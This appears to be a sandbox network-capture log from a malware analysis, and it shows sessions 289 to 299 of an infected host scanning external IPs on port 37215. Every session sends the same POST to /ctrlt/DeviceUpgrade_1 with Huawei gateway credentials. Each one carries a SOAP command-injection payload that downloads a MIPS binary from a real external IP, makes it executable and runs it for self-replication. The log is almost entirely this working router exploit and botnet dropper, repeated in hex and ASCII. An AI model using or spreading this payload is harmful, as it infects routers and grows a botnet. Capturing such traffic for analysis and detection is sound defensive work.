                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          289192.168.2.2355186157.180.166.6637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176409960 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          290192.168.2.235301067.203.61.6637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176409960 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          291192.168.2.2341130157.104.150.12237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176419973 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          292192.168.2.2347442197.72.244.20837215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176429033 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          293192.168.2.2341572117.236.3.25437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176451921 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          294192.168.2.2348244157.240.139.3237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176454067 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          295192.168.2.233959041.40.38.22637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176455021 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          296192.168.2.2343408197.168.10.5037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176459074 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          297192.168.2.2360322157.131.14.15037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176462889 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          298192.168.2.2357548197.237.64.7737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176482916 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          299192.168.2.2351452175.191.179.6237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:46:54.176490068 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
